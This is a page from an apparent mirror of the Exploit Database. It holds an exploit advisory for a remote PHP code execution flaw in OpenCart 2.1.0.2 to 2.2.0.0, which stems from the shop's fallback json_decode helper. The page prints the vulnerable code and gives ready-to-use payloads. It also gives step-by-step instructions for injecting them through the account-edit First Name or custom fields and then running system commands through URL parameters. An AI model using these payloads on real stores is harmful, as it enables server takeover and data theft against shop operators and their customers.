bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/39679.txt
Offensive Security 921bb6b2e3 DB: 2016-04-12 
9 new exploits

Hikvision Digital Video Recorder - Cross-Site Request Forgery
WPN-XM Serverstack 0.8.6 - Cross Site Request Forgery
OpenCart 2.1.0.2 to 2.2.0.0 - json_decode Function Remote Code Execution
CAM UnZip 5.1 - Archive Path Traversal
Axis Network Cameras - Multiple Vulnerabilities
Linux/x86_64 - bindshell (PORT: 5600) - 81 bytes
Android - IOMX getConfig/getParameter Information Disclosure
Android - IMemory Native Interface is Insecure for IPC Use
Novell Service Desk 7.1.0_ 7.0.3 and 6.5 - Multiple Vulnerabilities
2016-04-12 05:04:12 +00:00

48 lines
1.8 KiB
Text
Executable file
Raw Blame History

OpenCart json_decode function Remote PHP Code Execution
Author: Naser Farhadi
Twitter: @naserfarhadi
Date: 9 April 2016 Version: 2.1.0.2 to 2.2.0.0 (Latest version)
Vendor Homepage: http://www.opencart.com/
Vulnerability:
------------
/upload/system/helper/json.php
$match = '/".*?(?<!\\\\)"/';
$string = preg_replace($match, '', $json);
$string = preg_replace('/[,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]/', '', $string);
...
$function = @create_function('', "return {$json};"); /**** The Root of All Evil ****/
$return = ($function) ? $function() : null;
...
return $return;
Exploit(json_decode):
------------
var_dump(json_decode('{"ok":"{$_GET[b]($_GET[c])}"}'));
var_dump(json_decode('{"ok":"$_SERVER[HTTP_USER_AGENT]"}'));
var_dump(json_decode('{"ok":"1"."2"."3"}'));
Real World Exploit(OpenCart /index.php?route=account/edit)
------------
go to http://host/shop_directory/index.php?route=account/edit
fill $_SERVER[HTTP_USER_AGENT] as First Name
/** save it two times **/
Code execution happens when an admin user visits the administration panel, in this example
admin user sees his user agent as your First Name in Recent Activity :D
Another example(OpenCart account/edit or account/register custom_field): /** Best Case **/
------------
if admin adds a Custom Field from /admin/index.php?route=customer/custom_field for custom
user information like extra phone number,... you can directly execute your injected code.
go to http://host/shop_directory/index.php?route=account/edit
fill {$_GET[b]($_GET[c])} as Custom Field value
save it
go to http://host/shop_directory/index.php?route=account/edit&b=system&c=ls /** Mission Accomplished **/
Note:
------------
Exploit only works if PHP JSON extension is not installed.
Video: https://youtu.be/1Ai09IQK4C0
Reference in a new issue View git blame Copy permalink